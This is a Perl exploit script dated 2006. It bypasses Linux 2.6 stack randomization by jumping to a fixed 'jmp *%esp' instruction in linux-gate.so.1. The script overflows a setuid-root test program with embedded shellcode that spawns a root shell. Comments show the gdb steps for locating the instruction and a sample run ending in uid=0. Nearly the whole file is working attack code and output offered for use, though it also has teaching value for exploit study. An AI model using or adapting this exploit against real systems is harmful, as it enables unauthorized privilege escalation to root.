#!/usr/bin/perl -w use strict; # # [exp_jmp_rand.pl] Mon Apr 3 19:17:14 CEST 2006 # # Exploit solution against 2.6 stack randomization # Using the "jmp *%esp" technic. # # Copyright: bunker - http://rawlab.altervista.org # 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 # # # EXPLANATION: In 2.6 kernel we have a ghost library named # "linux-gate.so.1". It's a virtual DSO, a shared # object exposed by the kernel at a fixed address # in every process' memory. This part of memory # isn't randomized, so we can explore it to find # useful "call" or "jmp" instructions! # In this example we find "jmp *%esp" in memory # so we can execute shellcode in the stack ;-) # # # [Find "jmp *%esp" in memory] # # bunker@syn:~/vuln$ ldd vuln_prog # linux-gate.so.1 => (0xffffe000) <--- NOT RANDOM # libc.so.6 => /lib/tls/libc.so.6 (0xb7e84000) # /lib/ld-linux.so.2 (0xb7fcd000) # # bunker@syn:~/vuln$ gdb vuln_prog # (gdb) break main # Breakpoint 1 at 0x80483ad # (gdb) run # Starting program: /home/bunker/vuln/vuln_prog # Breakpoint 1, 0x080483ad in main () # (gdb) x/i 0xffffe000 # 0xffffe000: jg 0xffffe047 # (gdb) # 0xffffe002: dec %esp # (gdb) # 0xffffe003: inc %esi # ... # (gdb) # 0xffffe777: jmp *%esp <- Interesting, use this!! # # bunker@syn:~/vuln$ cat vuln_prog.c # int main(int argc, char **argv) { # char buf[256]; # strcpy(buf, argv[1]); # } # # bunker@syn:~/vuln$ ls -al vuln_prog # -rwsr-sr-x 1 root users 8340 2006-04-02 20:11 vuln_prog # # bunker@syn:~/vuln$ perl exp_jmp_rand.pl 68 # sh-3.1# id # uid=0(root) gid=100(users) groups=17(audio),18(video),19(cdrom),100(users) die "Usage: $0 \n [ vuln_buf < 4byte_ret * num ]\n" if ($#ARGV != 0); my $num = $ARGV[0]; print "Using multiplication factor $num...\n"; # jmp *%esp my $ret = 0xffffe777; # shellcode my $sc = "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x6a\x0b\x58". "\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e". "\x89\xe3\x52\x53\x89\xe1\xcd\x80"; # vulnerable file my $vuln = "./vuln_prog"; # build buffer my $buf = pack("L",$ret)x$num . $sc; # boom! :-D exec $vuln, $buf;